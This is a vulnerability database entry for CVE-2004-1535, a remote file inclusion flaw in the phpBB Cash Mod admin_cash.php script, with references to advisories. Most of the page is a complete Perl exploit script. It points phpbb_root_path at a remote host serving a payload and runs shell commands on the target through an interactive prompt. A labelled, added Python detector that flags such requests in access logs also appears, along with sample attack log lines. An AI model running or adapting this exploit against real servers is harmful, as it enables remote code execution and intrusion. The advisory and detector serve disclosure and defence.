phpBB Cash Mod module admin_cash.php PHP Remote File Inclusion Vulnerability
Vulnerability ID | 1108280 | Vulnerability type | Unknown |
Published | 2004-11-17 | Updated | 2004-12-31 |
CVE ID | CVE-2004-1535 |
CNNVD-ID | CNNVD-200412-499 |
Platform | PHP | CVSS score | 7.5 |
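|Vulnerability source
|Vulnerability details
The admin_cash.php script of the Cash Mod module for phpBB contains a PHP remote file inclusion vulnerability. A remote attacker can execute arbitrary PHP code by modifying the phpbb_root_path parameter so that it references a URL on a remote web server that hosts the code.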
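Added example, not part of the original advisory: a check defenders can run over web server access logs to flag requests to admin_cash.php whose phpbb_root_path parameter carries a URL instead of a local path. The Apache-style "combined" log format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside an Apache-style "combined" access-log entry (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# URL-style schemes handled by PHP stream wrappers. A forum root path is
# expected to be a local relative path, so any of these is suspicious.
REMOTE_RE = re.compile(r'\s*(?:https?|ftps?|php|data|expect)://', re.I)

def find_rfi_attempts(lines):
    """Return (client_ip, script_path, phpbb_root_path) for each suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/admin_cash.php"):
            continue
        # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught too,
        # which a plain text search for "http://" in the log would miss.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == "phpbb_root_path" and REMOTE_RE.match(value):
                hits.append((m.group("ip"), parts.path, value))
    return hits

# Constructed sample log lines (documentation IP ranges and example hosts only).
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Nov/2004:10:12:01 +0000] "GET /phpBB2/admin/'
    'admin_cash.php?setmodules=1&phpbb_root_path=./../ HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [18/Nov/2004:10:14:33 +0000] "GET /phpBB2/admin/'
    'admin_cash.php?setmodules=1&phpbb_root_path=http://remote.example/x.gif&cmd='
    ' HTTP/1.1" 200 431 "-" "-"',
    '203.0.113.9 - - [18/Nov/2004:10:14:40 +0000] "GET /forum/admin/'
    'admin_cash.php?setmodules=1&phpbb_root_path=http%3A%2F%2Fremote.example%2Fx.gif'
    ' HTTP/1.1" 404 209 "-" "-"',
    '198.51.100.7 - - [18/Nov/2004:10:15:02 +0000] "GET /phpBB2/viewtopic.php?t=12'
    ' HTTP/1.1" 200 9120 "-" "-"',
]

if __name__ == "__main__":
    for ip, path, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} requested {path} with phpbb_root_path={value}")
```

A hit with a 200 response status deserves closer review than one answered with 404, since the script was present and processed the request.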
|Exploit (EXP)
source: http://www.securityfocus.com/bid/11701/info
A vulnerability is reported to exist in the phpBB Cash_Mod module that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system.
Remote attackers could potentially exploit this issue via a vulnerable variable to include a remote malicious PHP script, which will be executed in the context of the web server hosting the vulnerable software.
#####################################################
# phpBB2.pl exploit 2004 http://securityfocus.com/bid/11701
# Spawn bash style Shell with webserver uid
# Greetz foxtwo, Zone-H
# This Script is actually under development
#####################################################
use strict;
use IO::Socket;
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
$U[1] = "/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://utenti.lycos.it/z00/xpl.gif&cmd=";
$U[2] = "/forum/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://utenti.lycos.it/z00/xpl.gif&cmd=";
&intro;
&scan;
&choose;
&command;
&exit;
sub intro {
&help;
&host;
&server;
sleep 3;
};
sub host {
print "nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
print "nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};
sub server {
my $X;
print "nnnnnnnnnnnnnnnnnnnnnnnn";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
$output = $results[$X];
if (defined $output){
if ($output =~/IIS/){ $webserver = "apache" };
};
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
}else{
print "nnOK";
};
};
sub scan {
my $status = "not_vulnerable";
print "nnnnnnnnnnnnnnnnnnnnnnnn";
print "Testing string ONE and TWO";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
$flag = "1";
$status = "vulnerable";
};
};
if ($flag eq "0") {
}else{
};
};
if ($status eq "not_vulnerable"){
};
};
sub choose {
print "nSelect a URL (type 0 to input)";
my $choice=<STDIN>;
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
};
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};
sub command {
while ($command !~/quit/i) {
print "nHELP QUIT URL SCAN Or Command
n[$host]$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/s/+/g;
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
sub connect {
my $connection = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => "$host",
PeerPort => "$port",
) or die "nSorry UNABLE TO CONNECT To $host On Port $port.n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command HTTP/1.1rnHost: $hostrnrn";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1rnHost: $hostrnrn";
};
while ( <$connection> ) {
@results = <$connection>;
};
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};
sub output{
print "nOUTPUT FROM $host. nn";
my $display;
if ($probe eq "string") {
my $X;
for ($X=0; $X<=10; $X++) {
$display = $results[$X];
if (defined $display){print "$display";};
sleep 1;
};
}else{
foreach $display (@results){
print "$display";
sleep 1;
};
};
};
sub exit{
print "nnn
SPABAM 2004.";
print "nspabam.da.ru [email protected]";
print "nnn";
exit;
};
sub help {
print "nnnnnnnnnnnnnnnnnnnnnnnn";
print "n
PHPBB2.0 - 2.0.10
Command Execution Vulnerability by SPABAM 2004" ;
print "n
";
print "n phpBB2";
print "n
note.. ORP";
print "n";
print "n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "n Command: SCAN URL HELP QUIT";
print "nnnnnnnnnnn";
};
|Affected products
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Gr
|References
Source: XF
Name: phpbb-admincashphp-file-include(18151)
Link: http://xforce.iss.net/xforce/xfdb/18151
Source: BUGTRAQ
Name: 20041118 Re: Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110082153702843&w=2
Source: BUGTRAQ
Name: 20041118 Vulnerabilities in forum phpBB2 with Cash_Mod (all ver.)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110075903308817&w=2